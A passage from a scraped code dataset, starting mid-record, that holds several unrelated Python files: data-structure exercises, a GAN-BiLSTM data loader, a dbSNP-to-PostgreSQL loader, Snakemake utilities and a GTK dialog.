startsWith(self, prefix: str) -> bool:\n root = self.root\n size = len(prefix)\n for i in range(size):\n idx = ord(prefix[i])-ord('a')\n if root.children[idx]:\n root = root.children[idx]\n else:\n return False\n return True\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)","repo_name":"miruts-xz/competitive-programming","sub_path":"library/python/Trie.py","file_name":"Trie.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8636988418","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport torch.utils.data as Data\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom sdv.single_table import CTGANSynthesizer\nfrom sdv.metadata import SingleTableMetadata\nfrom sklearn.model_selection import ShuffleSplit\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nfrom sdv.sampling import Condition\nimport opt\ndevice = opt.device\n\n#todo 修改bug\ndef transform_dataset(x_data,y_data,n_input, n_output):\n #n_output固定为1\n all_data = x_data\n data_size=x_data.shape[0]\n X = np.empty((data_size-n_input+1, n_input, all_data.shape[1]))\n Y = np.empty((data_size-n_input+1, y_data.shape[1]))\n for i in range(data_size - n_input+1):\n X[i] = all_data[i:i + n_input, :]\n Y[i] = y_data[i + n_input-1, :]\n return X,Y\n\n\n# 准备数据\ndef get_data(path,step=512):\n \n train = pd.read_csv(path)\n train.columns=['speed', 'speed_med_5', 'speed_med_20', 'speed_SD_5', 'speed_SD_20',\n 'acceleration', 'acceleration_med_5', 'acceleration_med_20', 'acceleration_SD_5', 'acceleration_SD_20',\n 'angular_speed', 'angular_speed_med_5', 'angular_speed_med_20', 'angular_speed_SD_5', 'angular_speed_SD_20',\n 'angular_acceleration', 'angular_acceleration_med_5', 'angular_acceleration_med_20', 'angular_acceleration_SD_5', 'angular_acceleration_SD_20',\n 'angle_diff', 'angle_diff_med_5', 'angle_diff_med_20', 'angle_diff_SD_5', 'angle_diff_SD_20',\n 'tag','lon','lat']\n train_data = train.iloc[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 26, 27]].to_numpy().astype(float)\n train_tag= train.iloc[:, [25]].to_numpy().astype(int)\n\n sss=ShuffleSplit(n_splits=1,test_size=opt.testRatio,random_state=0)\n for train_index,test_index in sss.split(train_data,train_tag):\n X_train,X_test=train_data[train_index],train_data[test_index]\n y_train,y_test=train_tag[train_index],train_tag[test_index]\n \n sss=ShuffleSplit(n_splits=1,test_size=opt.valRatio,random_state=0)\n for train_index,test_index in sss.split(X_train,y_train):\n X_train,X_valid=X_train[train_index],X_train[test_index]\n y_train,y_valid=y_train[train_index],y_train[test_index]\n\n # sc = StandardScaler()\n # X_train = sc.fit_transform(X_train)\n # X_valid = sc.transform(X_valid)\n # X_test = sc.transform(X_test)\n\n # X_all=sc.fit_transform(train_data)\n X_all=train_data\n\n if opt.useGAN==True:\n data_train=np.c_[X_train,y_train]\n data_train = pd.DataFrame(data_train,columns=['speed', 'speed_med_5', 'speed_med_20', 'speed_SD_5', 'speed_SD_20',\n 'acceleration', 'acceleration_med_5', 'acceleration_med_20', 'acceleration_SD_5', 'acceleration_SD_20',\n 'angular_speed', 'angular_speed_med_5', 'angular_speed_med_20', 'angular_speed_SD_5', 'angular_speed_SD_20',\n 'angular_acceleration', 'angular_acceleration_med_5', 'angular_acceleration_med_20', 'angular_acceleration_SD_5', 'angular_acceleration_SD_20',\n 'angle_diff', 'angle_diff_med_5', 'angle_diff_med_20', 'angle_diff_SD_5', 'angle_diff_SD_20',\n 'lon','lat','tag'])\n weightsPath=opt.GAN_path\n if(opt.useGAN_weights and os.path.exists(weightsPath)):\n model=CTGANSynthesizer.load(weightsPath)\n else:\n metadata = SingleTableMetadata()\n metadata.detect_from_dataframe(data_train)\n model = CTGANSynthesizer(\n metadata,\n epochs=opt.GAN_epoch,\n verbose=True\n )\n model.fit(data_train)\n model.save(weightsPath)\n ser=data_train['tag'].value_counts()\n num_rows=abs(ser[0]-ser[1])\n cnd=0\n if ser[0]>ser[1]:\n cnd=1\n condition = Condition({'tag': cnd}, num_rows=num_rows)\n synthetic_train = model.sample_from_conditions(conditions=[condition])\n data_train=pd.concat([data_train,synthetic_train], axis=1)\n X_train = data_train.iloc[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26]].to_numpy().astype(float)\n y_train= data_train.iloc[:, [27]].to_numpy().astype(int).reshape(-1,1)\n # data_train.to_csv(r\"./data/generate/ctgan.csv\", index=False)\n\n X_train,y_train=transform_dataset(X_train,y_train,step,1)\n X_valid,y_valid=transform_dataset(X_valid,y_valid,step,1)\n X_test,y_test=transform_dataset(X_test,y_test,step,1)\n X_all,y_all=transform_dataset(X_all,train_tag,step,1)\n\n\n X_train = torch.tensor(X_train, dtype=torch.float32).to(device)\n y_train = torch.tensor(y_train).to(device)\n X_valid = torch.tensor(X_valid, dtype=torch.float32).to(device)\n y_valid = torch.tensor(y_valid).to(device)\n X_test=torch.tensor(X_test, dtype=torch.float32).to(device)\n y_test = torch.tensor(y_test).to(device)\n X_all=torch.tensor(X_all, dtype=torch.float32).to(device)\n y_all = torch.tensor(y_all).to(device)\n return X_train,y_train,X_valid,y_valid,X_test,y_test,X_all,y_all\n\n#返回训练loader\ndef get_loader(path, step=512, batch_size=128,num_workers=4):\n X_train,y_train,X_valid,y_valid,X_test,y_test,X_all,y_all=get_data(path,step)\n return __dataLoader(X_train,y_train,batch_size,num_workers),__dataLoader(X_valid,y_valid,batch_size,num_workers),__dataLoader(X_test,y_test,batch_size,num_workers),__dataLoader(X_all,y_all,batch_size,num_workers)\n\n# loader权重\ndef __dataLoader(X,Y,batch_size,num_workers=4):\n train_dataset = Data.TensorDataset(X.to(device), Y.to(device))\n if opt.useGAN==True:\n weights = [3 if label == 0 else 1 for label in Y]\n sampler = WeightedRandomSampler(weights,num_samples=Y.size()[0], replacement=True)\n train_loader=Data.DataLoader( \n dataset=train_dataset, batch_size=batch_size,num_workers=num_workers,sampler=sampler\n )\n else:\n train_loader = Data.DataLoader(\n dataset=train_dataset, batch_size=batch_size, shuffle=True,num_workers=num_workers)\n return train_loader\n\n#返回predict loader\ndef get_predict_loader(path, step=512, batch_size=128,num_workers=4):\n train = pd.read_csv(path)\n train.columns=['speed', 'speed_med_5', 'speed_med_20', 'speed_SD_5', 'speed_SD_20',\n 'acceleration', 'acceleration_med_5', 'acceleration_med_20', 'acceleration_SD_5', 'acceleration_SD_20',\n 'angular_speed', 'angular_speed_med_5', 'angular_speed_med_20', 'angular_speed_SD_5', 'angular_speed_SD_20',\n 'angular_acceleration', 'angular_acceleration_med_5', 'angular_acceleration_med_20', 'angular_acceleration_SD_5', 'angular_acceleration_SD_20',\n 'angle_diff', 'angle_diff_med_5', 'angle_diff_med_20', 'angle_diff_SD_5', 'angle_diff_SD_20',\n 'tag','lon','lat']\n train_data = train.iloc[:, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 26, 27]].to_numpy().astype(float)\n train_tag= train.iloc[:, [25]].to_numpy().astype(int)\n\n # sc = StandardScaler()\n # X_all=sc.fit_transform(train_data)\n\n X_all=train_data\n X_all,y_all=transform_dataset(X_all,train_tag,step,1)\n\n X_all=torch.tensor(X_all, dtype=torch.float32).to(device)\n y_all = torch.tensor(y_all).to(device)\n\n dataset = Data.TensorDataset(X_all.to(device), y_all.to(device))\n loader = Data.DataLoader(dataset=dataset, batch_size=batch_size, shuffle=False,num_workers=num_workers)\n \n return loader\n\nif __name__==\"__main__\":\n #测试数据\n get_data(r\"data\\train\\全部标注数据合并.csv\")\n","repo_name":"hysyyds/GAN-BiLSTM","sub_path":"utils/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":7950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22675928856","text":"# queue implementation practice\n\n\nclass CircularQueue(object):\n\n def __init__(self):\n self.capacity = 5 # initial length of data array.\n\n # initializing data array\n self.data = []\n for i in range(self.capacity):\n self.data.append(None)\n\n self.front = 0\n self.end = -1\n self.size = 0\n\n def is_empty(self):\n if self.size == 0:\n return True\n else:\n return False\n\n def is_full(self):\n if self.size == self.capacity:\n return True\n else:\n return False\n\n def check_size(self):\n return self.size\n\n def check_capacity(self):\n return self.capacity\n\n def print_queue(self):\n print(self.data)\n print('front :', self.front, '/ end :', self.end)\n\n def front(self):\n if self.is_empty():\n print(\"queue is empty\")\n return None\n else:\n return self.data[self.front]\n\n # return circular index if input index is larger than maximum index of data array\n def get_circular_index(self, idx):\n if idx >= self.capacity:\n idx %= self.capacity\n return idx\n\n # reallocate data array as twice larger one\n def data_reallocate(self):\n # initializing new data array\n new_capacity = 2*self.capacity\n self.new_data = []\n for i in range(new_capacity):\n self.new_data.append(None)\n\n # copy old data into new data array. rearrange data location so front index shall be zero(0)\n j = 0\n while self.front != self.end:\n self.new_data[j] = self.data[self.front]\n j += 1\n self.front += 1\n self.front = self.get_circular_index(self.front)\n\n self.new_data[j] = self.data[self.end] # after while loop, final data (at end index) is not copied yet.\n\n # reset front & end index, its capacity and data array name\n self.front = 0\n self.end = j\n self.data = self.new_data\n self.capacity = new_capacity\n\n def enqueue(self, value):\n if self.is_full():\n self.data_reallocate()\n\n self.size += 1\n self.end += 1\n self.end = self.get_circular_index(self.end) # if increased index is out of maximum, get circular index\n\n self.data[self.end] = value\n\n def dequeue(self):\n if self.is_empty():\n print(\"queue is empty\")\n return None\n else:\n front_data = self.data[self.front] # copy data which shall be popped.\n self.data[self.front] = None # remove popped data to prevent confusion\n self.front += 1\n self.size -= 1\n self.front = self.get_circular_index(self.front) # if increased index is out of maximum, get circular index\n return front_data # return copied data\n\n\n# Circular array queue implementation test\n# uncommend each line to test\n# cq = CircularQueue()\n# print('create Circular Queue instance. check size & capacity : ', cq.check_size(), '&', cq.check_capacity())\n# print('is queue empty? :', cq.is_empty())\n# print('\\nenqueue some data : [5,6,8,10,9]')\n# for i in [5, 6, 8, 10, 9]:\n# cq.enqueue(i)\n# print('is queue full now? :', cq.is_full())\n# cq.print_queue()\n#\n# print('\\ndequeue some 3 data now')\n# print('dequeue :', cq.dequeue())\n# print('dequeue :', cq.dequeue())\n# print('dequeue :', cq.dequeue())\n# print('check size & capacity :', cq.check_size(), '&', cq.check_capacity())\n# cq.print_queue()\n#\n# print('\\nenqueue again now : [7,-2,-7]')\n# for i in [7, -2, -7]:\n# cq.enqueue(i)\n# print('check size & capacity :', cq.check_size(), '&', cq.check_capacity())\n# cq.print_queue()\n#\n# print('\\nenqueue more. test array reallocation : [12,15,19]')\n# for i in [12, 15, 19]:\n# cq.enqueue(i)\n# print('check size & capacity :', cq.check_size(), '&', cq.check_capacity())\n# cq.print_queue()\n# cq.check_front_end_index()\n","repo_name":"ino-jeong/study-practice","sub_path":"python practice/queue_practice(circular).py","file_name":"queue_practice(circular).py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30449523133","text":"# !/usr/bin/env python3\n# coding: utf-8\n\n# 5. Написать программу принимающую от пользователя список строк и число и выводящую\n# новый список из слов, длина которой меньше указанного числа.\n\n\ndef max_length(list1, max_len):\n i = 0\n while i in range(len(list1)):\n if len(list1[i]) > max_len:\n list1.remove(list1[i])\n else:\n i += 1\n return list1\n\n\ndef list_of_strings():\n list1 = list()\n while True:\n user_input = input(\"enter string to add in list or 'done' to finish: \")\n if user_input == 'done':\n break\n else:\n list1.append(user_input)\n return list1\n\n","repo_name":"PlusSP/Python","sub_path":"lists/strings_list.py","file_name":"strings_list.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18647600053","text":"import asyncpg\nimport asyncio\nimport ftplib\nimport gzip\nfrom multiprocessing import cpu_count, Pool\nimport time\nimport threading\nfrom typing import List\nimport ujson as json\n\nfrom .types import (\n RefSnpCopyFromData,\n RefSnpAllele,\n RefSnpAlleleFreqStudy,\n RefSnpAlleleClinDisease)\n\n\nclass SnipLoader:\n def __init__(self, database_name): # , db_conn_string):\n self.database_name = database_name\n self.file_blocksize = 1024 * 1024\n\n def download_dbsnp_file(self, dbsnp_filename, chromosome):\n self.chromosome = str(chromosome)\n self.dbsnp_filename = dbsnp_filename\n with open(dbsnp_filename, \"wb\") as fp:\n ftp = ftplib.FTP(\"ftp.ncbi.nlm.nih.gov\")\n ftp.login()\n ftp.cwd(\"snp/.redesign/latest_release/JSON\")\n size_gb = round(ftp.size(dbsnp_filename) / (1024**3), 2)\n print(f\"Filesize: {size_gb} GB\")\n sock = None\n while not sock: # Try to open the socket conn w/ server\n print(\"Trying to establish FTP conn\")\n sock = ftp.transfercmd(f\"RETR {dbsnp_filename}\")\n time.sleep(5)\n\n def download():\n transferred, blocks = 0, 0\n while True:\n byte_chunk = sock.recv(1024*1024*8)\n if not byte_chunk:\n break\n blocks += 1\n transferred += len(byte_chunk)\n transferred_mb = round(transferred / 1024 / 1024, 2)\n if blocks % 1000 == 0:\n print(f\"Transferred {transferred_mb}MB / \"\n f\"{size_gb * 1024}MB\")\n fp.write(byte_chunk)\n sock.close()\n fp.close()\n t = threading.Thread(target=download)\n t.start()\n while t.is_alive():\n t.join(60)\n ftp.voidcmd(\"NOOP\")\n\n def load_ref_snps(self, dbsnp_filename, chromosome):\n self.chromosome = chromosome\n num_processes = cpu_count()\n print(f\"Found '{num_processes}' CPUs\")\n loop = asyncio.get_event_loop()\n with Pool(num_processes) as pool:\n with gzip.open(dbsnp_filename) as gzip_fp:\n print(\"Mapping...\")\n copy_from_data_iter = pool.imap_unordered(\n self._generate_parsed_data,\n gzip_fp,\n 1024)\n loop.run_until_complete(self._load(copy_from_data_iter))\n\n async def _load(self, parsed_data_iter):\n conn = await asyncpg.connect(database=self.database_name, user=\"SeanH\")\n await conn.execute(\"SET session_replication_role to 'replica'\")\n table_names = [table_name for table_name in RefSnpCopyFromData._fields]\n row_buff_dict = {table_name: [] for table_name in table_names}\n buff_size = 0\n for copy_from_data in parsed_data_iter:\n for table_name in table_names:\n for copy_from_row in getattr(copy_from_data, table_name):\n row_buff_dict[table_name].append(copy_from_row)\n buff_size += 1\n if buff_size % 5000 == 0: # Dump\n print(f\"Dumping (SNPs Processed: {buff_size})\")\n await self._dump_buffer(row_buff_dict, conn)\n row_buff_dict = {table_name: [] for table_name in table_names}\n print(\"Done.\")\n await conn.close()\n\n async def _dump_buffer(self, row_buff_dict, conn):\n for table_name in row_buff_dict.keys():\n records = row_buff_dict[table_name]\n if not records:\n continue\n await conn.copy_records_to_table(\n table_name,\n records=records,\n columns=records[0]._fields)\n\n def _generate_parsed_data(self, raw_line) -> RefSnpCopyFromData:\n rsnp_json = json.loads(raw_line)\n ref_snp_id = int(rsnp_json['refsnp_id'])\n rsnp_placements = rsnp_json['primary_snapshot_data'][\n 'placements_with_allele']\n copy_from_data = RefSnpCopyFromData(\n ref_snp_alleles=[],\n ref_snp_allele_freq_studies=[],\n ref_snp_allele_clin_diseases=[])\n if not rsnp_placements:\n return copy_from_data\n allele_data = self._find_alleles_from_assembly(rsnp_placements)\n if not allele_data:\n return copy_from_data\n variant_ref_snp_alleles = self._get_variant_alleles(self.chromosome,\n allele_data,\n ref_snp_id)\n if not variant_ref_snp_alleles:\n return copy_from_data\n for allele in variant_ref_snp_alleles:\n allele_idx = allele.ref_snp_allele_idx\n allele_annotation = rsnp_json['primary_snapshot_data'][\n 'allele_annotations'][allele_idx]\n gene_locii = self._parse_gene_locii(allele_annotation)\n freq_studies = self._parse_freq_studies(allele_annotation,\n ref_snp_id, allele_idx)\n clin_diseases = self._parse_clin_diseases(allele_annotation,\n ref_snp_id, allele_idx)\n copy_from_data = self._update_copy_from_data(\n copy_from_data, allele, freq_studies, clin_diseases, gene_locii)\n return copy_from_data\n\n @staticmethod\n def _find_alleles_from_assembly(rsnp_placements,\n assembly_name=\"GRCh38\"):\n for rsnp_placement in rsnp_placements:\n annot = rsnp_placement.get('placement_annot')\n if not annot or not annot.get('seq_id_traits_by_assembly'):\n return\n assembly_info_ls = annot['seq_id_traits_by_assembly']\n assembly_info = assembly_info_ls[0]\n this_assembly_name = assembly_info.get(\"assembly_name\")\n if assembly_name in this_assembly_name:\n return rsnp_placement['alleles']\n\n @staticmethod\n def _get_variant_alleles(chromosome, alleles,\n ref_snp_id) -> List[RefSnpAllele]:\n variant_alleles = []\n for idx, allele in enumerate(alleles):\n spdi = allele['allele']['spdi']\n ins, delete = spdi['inserted_sequence'], spdi['deleted_sequence']\n if ins != delete:\n variant_alleles.append(RefSnpAllele(\n ins_seq=ins,\n del_seq=delete,\n position=spdi['position'],\n ref_snp_allele_idx=idx,\n chromosome=chromosome,\n ref_snp_id=ref_snp_id,\n gene_locii=None))\n return variant_alleles\n\n @staticmethod\n def _update_copy_from_data(copy_from_data: RefSnpCopyFromData,\n allele: RefSnpAllele,\n freq_studies: List[RefSnpAlleleFreqStudy],\n clin_diseases: List[RefSnpAlleleClinDisease],\n gene_locii: List[str]):\n copy_from_data.ref_snp_alleles.append(\n RefSnpAllele(\n del_seq=allele.del_seq,\n ins_seq=allele.ins_seq,\n position=allele.position,\n ref_snp_allele_idx=allele.ref_snp_allele_idx,\n chromosome=allele.chromosome,\n ref_snp_id=allele.ref_snp_id,\n gene_locii=gene_locii))\n copy_from_data.ref_snp_allele_freq_studies.extend(freq_studies)\n copy_from_data.ref_snp_allele_clin_diseases.extend(clin_diseases)\n return copy_from_data\n\n @staticmethod\n def _parse_freq_studies(allele_annotation, ref_snp_id, allele_idx):\n return [RefSnpAlleleFreqStudy(\n name=freq['study_name'],\n allele_count=freq['allele_count'],\n total_count=freq['total_count'],\n ref_snp_allele_idx=allele_idx,\n ref_snp_id=ref_snp_id)\n for freq in allele_annotation['frequency'] or []]\n\n @staticmethod\n def _parse_clin_diseases(allele_annotation, ref_snp_id, allele_idx):\n return [RefSnpAlleleClinDisease(\n citation_list=clin['citations'],\n disease_name_csv=\",\".join(clin['disease_names']),\n clinical_significance_csv=\",\".join(clin['clinical_significances']),\n ref_snp_allele_idx=allele_idx,\n ref_snp_id=ref_snp_id)\n for clin in allele_annotation['clinical']]\n\n @staticmethod\n def _parse_gene_locii(allele_annotation):\n assembly_annotation = allele_annotation['assembly_annotation']\n return set(\n [gene['locus'] for gene in\n (assembly_annotation[0]['genes']\n if assembly_annotation else [])])\n","repo_name":"seanharr11/snip_warehouse","sub_path":"snip_warehouse/snip_loader.py","file_name":"snip_loader.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"2977448901","text":"dirs = dict(zip(\"UDLR\", [-1j, 1j, -1+0j, 1+0j]))\nSAMPLE = False\n\nif SAMPLE:\n inp = r\"\"\"5 10 25\"\"\"\nelse:\n inp = r\"\"\"paste\nyour\ninput\"\"\"\n\nout = 0\nfor line in inp.split(\"\\n\"):\n a,b,c = map(int,line.split())\n if not (a+b <= c or b+c <= a or a+c <= b):\n out += 1\nprint(out)\n","repo_name":"mcpower/adventofcode","sub_path":"2016/03-1.py","file_name":"03-1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"37"} +{"seq_id":"22109573662","text":"\"\"\"\n SPLIT LINKED LIST (50CIQ 41: SPLIT A LINKED LIST)\n\n Write a function, which accepts the head of a linked list, then splits the provided linked list, returning two\n (heads of) linked lists. The resulting linked lists should maintain the original order and the lengths must not\n differ by more than one.\n\n Consider the following linked list:\n\n 0 ⟶ 0 ⟶ 0 ⟶ 1 ⟶ 2 ⟶ 0 ⟶ 1 ⟶ 4 ⟶ 5\n\n Example:\n ll = Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5)))))))))\n Input = ll # Or, the linked list above.\n Output = Node(0, Node(0, Node(0, Node(1)))), Node(2, Node(0, Node(1, Node(4, Node(5)))))\n\"\"\"\nimport copy\n\n\n# Questions you should ask the interviewer (if not explicitly stated):\n# - What time/space complexity are you looking for?\n# - Clarify the question (what to do when ODD length list, SINGLE/DOUBLY linked list, data type, etc...)?\n\n\n# APPROACH: Fast/Slow Runner\n#\n# Use two pointers, one moving at twice the speed of the other, to determine where the linked list needs to be split.\n#\n# Time Complexity: O(n), where n is the number of nodes in the linked list.\n# Space Complexity: O(1).\ndef split_linked_list(head):\n if head and head.next:\n fast = slow = head\n prev = None\n while fast and fast.next:\n fast = fast.next.next\n prev = slow\n slow = slow.next\n if prev:\n prev.next = None\n return head, slow\n\n\nclass Node:\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\n\n def __iter__(self):\n yield self.value\n if self.next:\n yield from self.next\n\n def __repr__(self):\n return f\"{self.value} ⟶ {'None' if self.next is None else repr(self.next)}\"\n\n\nlinked_lists = [Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5))))))))),\n Node(0, Node(1, Node(2, Node(3, Node(4, Node(5)))))),\n Node(0, Node(1, Node(0, Node(1, Node(3, Node(0)))))),\n Node(6, Node(9)),\n Node(0),\n None]\nfns = [split_linked_list]\n\nfor l in linked_lists:\n for fn in fns:\n print(f\"{fn.__name__}({l}): {fn(copy.deepcopy(l))}\")\n print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/data_structure/linked_list/split_linked_list.py","file_name":"split_linked_list.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70940261869","text":"def lcs (X, Y, m, n):\n\tif m == 0 or n == 0:\n\t\treturn 0\n\t\n\tif X[m-1] == Y[n-1]:\n\t\treturn lcs (X, Y, m-1, n-1) + 1\n\t\n\treturn max(lcs(X, Y, m-1, n), lcs(X, Y, m, n-1))\n\t\nif __name__ == '__main__':\n\tX = input(\"Please enter first string : \")\n\tY = input(\"Please enter second string : \")\n\tm = len(X)\n\tn = len(Y)\n\tprint(\"Maximum Subsequence of X and Y is :\", lcs(X, Y, m, n))\n","repo_name":"ty01khan/InterviewBit","sub_path":"Python/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33532849492","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Johannes Köster\"\n\nimport os\nimport json\nimport io\nimport re\nimport fnmatch\nimport mimetypes\nimport base64\nimport inspect\nimport textwrap\nimport tempfile\nimport subprocess\nimport shutil\nimport mimetypes\nimport datetime\nfrom itertools import chain\n\nfrom snakemake.io import regex, Namedlist\nfrom snakemake.logging import logger\n\n\ndef linecount(filename):\n \"\"\"\n Return the number of lines of given file\n\n Arguments\n filename -- the path to the file\n \"\"\"\n with open(filename) as f:\n return sum(1 for l in f)\n\n\ndef listfiles(pattern, restriction=None, omit_value=None):\n \"\"\"\n Yield a tuple of existing filepaths for the given pattern.\n Wildcard values are yielded as the second tuple item.\n\n Arguments\n pattern -- a filepattern.\n Wildcards are specified in snakemake syntax, e.g. \"{id}.txt\"\n \"\"\"\n pattern = os.path.normpath(pattern)\n first_wildcard = re.search(\"{[^{]\", pattern)\n if first_wildcard:\n dirname = os.path.dirname(pattern[:first_wildcard.start()])\n if not dirname:\n dirname = \".\"\n else:\n dirname = os.path.dirname(pattern)\n pattern = re.compile(regex(pattern))\n for dirpath, dirnames, filenames in os.walk(dirname):\n for f in chain(filenames, dirnames):\n if dirpath != \".\":\n f = os.path.join(dirpath, f)\n match = re.match(pattern, f)\n if match and len(match.group()) == len(f):\n wildcards = Namedlist(fromdict=match.groupdict())\n if restriction is not None:\n invalid = any(\n omit_value not in v and v != wildcards[k]\n for k, v in restriction.items())\n if not invalid:\n yield f, wildcards\n else:\n yield f, wildcards\n\n\ndef makedirs(dirnames):\n \"\"\"\n Recursively create the given directory or directories without\n reporting errors if they are present.\n \"\"\"\n if isinstance(dirnames, str):\n dirnames = [dirnames]\n for dirname in dirnames:\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n\ndef report(\n text, path,\n stylesheet=os.path.join(os.path.dirname(__file__), \"report.css\"),\n defaultenc=\"utf8\", template=None, metadata=None, **files):\n \"\"\"\n Create an HTML report using python docutils.\n Attention: This function needs Python docutils to be installed for the\n python installation you use with Snakemake.\n\n Arguments\n text -- The \"restructured text\" as it is expected by python docutils.\n path -- The path to the desired output file\n stylesheet -- An optional path to a css file that defines the style of the\n document. This defaults to /report.css.\n Use the default to get a hint how to create your own.\n defaultenc -- The encoding that is reported to the browser for embedded\n text files, defaults to utf8.\n template -- An optional path to a docutils HTML template.\n metadata -- E.g. an optional author name or email address.\n\n All other keyword args are intepreted as paths to files that shall be\n embedded into the document. They keywords will be available as link\n targets in the text. E.g. append a file as keyword arg via F1=input[0]\n and put a download link in the text like this:\n\n report('''\n ==============\n Report for ...\n ==============\n\n Some text. A link to an embedded file: F1_.\n\n Further text.\n ''', outputpath, F1=input[0])\n\n Instead of specifying each file as a keyword arg, you can also expand\n the input of your rule if it is completely named, e.g.:\n\n report('''\n Some text...\n ''', outputpath, **input)\n\n \"\"\"\n outmime, _ = mimetypes.guess_type(path)\n if outmime != \"text/html\":\n raise ValueError(\"Path to report output has to be an HTML file.\")\n from docutils.core import publish_file\n definitions = textwrap.dedent(\"\"\"\n .. role:: raw-html(raw)\n :format: html\n\n \"\"\")\n\n metadata = textwrap.dedent(\"\"\"\n\n .. container::\n :name: metadata\n\n {metadata} {date}\n\n \"\"\").format(metadata=metadata, date=datetime.date.today().isoformat())\n\n text = format(textwrap.dedent(text), stepout=2)\n\n attachments = [textwrap.dedent(\"\"\"\n .. container::\n :name: attachments\n \n \"\"\")]\n for name, file in sorted(files.items()):\n mime, encoding = mimetypes.guess_type(file)\n if mime is None:\n mime = \"text/plain\"\n logger.warning(\"Could not detect mimetype for {}, assuming \"\n \"text/plain.\".format(file))\n if encoding is None:\n encoding = defaultenc\n with open(file, \"rb\") as f:\n data = base64.b64encode(f.read())\n attachments.append(\n '''\n .. container::\n :name: {name}\n\n [{name}] :raw-html:`{filename}`\n '''.format(\n name=name,\n filename=os.path.basename(file),\n mime=mime,\n charset=encoding,\n data=data.decode()))\n\n text = definitions + text + \"\\n\\n\" + \"\\n\\n\".join(attachments) + metadata\n\n overrides = dict()\n if template is not None:\n overrides[\"template\"] = template\n if stylesheet is not None:\n overrides[\"stylesheet_path\"] = stylesheet\n html = open(path, \"w\")\n publish_file(\n source=io.StringIO(text), destination=html,\n writer_name=\"html\", settings_overrides=overrides)\n\n\ndef R(code):\n import rpy2.robjects as robjects\n robjects.r(format(textwrap.dedent(code), stepout=2))\n\n\ndef format(string, *args, stepout=1, **kwargs):\n class SequenceFormatter:\n def __init__(self, sequence):\n self._sequence = sequence\n\n def __getitem__(self, i):\n return self._sequence[i]\n\n def __str__(self):\n return \" \".join(self._sequence)\n\n frame = inspect.currentframe().f_back\n while stepout > 1:\n if not frame.f_back:\n break\n frame = frame.f_back\n stepout -= 1\n\n variables = dict(frame.f_globals)\n # add local variables from calling rule/function\n variables.update(frame.f_locals)\n variables.update(kwargs)\n strmethods = list()\n for key, value in list(variables.items()):\n if type(value) in (list, tuple, set, frozenset):\n variables[key] = SequenceFormatter(value)\n try:\n return string.format(*args, **variables)\n except KeyError as ex:\n raise NameError(\n \"The name {} is unknown in this context. Please\"\n \"make sure that you defined that variable. \"\n \"Also note that braces not used for variable access \"\n \"have to be escaped by repeating them, \"\n \"i.e. {{print $1}}\".format(str(ex)))\n\n\nclass Unformattable:\n\n def __init__(self, errormsg=\"This cannot be used for formatting\"):\n self.errormsg = errormsg\n\n def __str__(self):\n raise ValueError(self.errormsg)\n\n\ndef read_job_properties(jobscript, prefix=\"# properties\"):\n with open(jobscript) as jobscript:\n for l in jobscript:\n if l.startswith(prefix):\n return json.loads(l.split(\"=\")[1])\n","repo_name":"gusevfe/snakemake","sub_path":"snakemake/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29926525198","text":"import os\n\nimport gtk\nimport gobject\n\nfrom util import getComboBoxText, errorDialog\n\nclass AskForHelp:\n '''\n Core functionality for the ask for help box, includes validation\n '''\n def __init__(self, parentWindow, subjects, currentSubject = None):\n '''\n subjects - List of all subjects that the user can select\n currentSubject - The subject that should be selected by default\n '''\n self.builder = gtk.Builder()\n dr = os.path.dirname(__file__)\n self.builder.add_from_file(os.path.join(dr, 'gui', 'askforhelp.glade'))\n\n self.window = self.builder.get_object('dgAskForHelp')\n if parentWindow is not None:\n self.window.set_transient_for(parentWindow)\n self.builder.connect_signals(self)\n\n self.window.show_all()\n\n cb = self.builder.get_object('cbSubject')\n ls = gtk.ListStore(gobject.TYPE_STRING)\n cb.set_model(ls)\n for i, subject in enumerate(subjects):\n ls.append([subject])\n if subject == currentSubject:\n cb.set_active(i)\n\n cell = gtk.CellRendererText()\n cb.pack_start(cell, True)\n cb.add_attribute(cell, 'text', 0)\n\n self.subject = self.desc = None\n self.ok = False\n\n self.window.run()\n\n 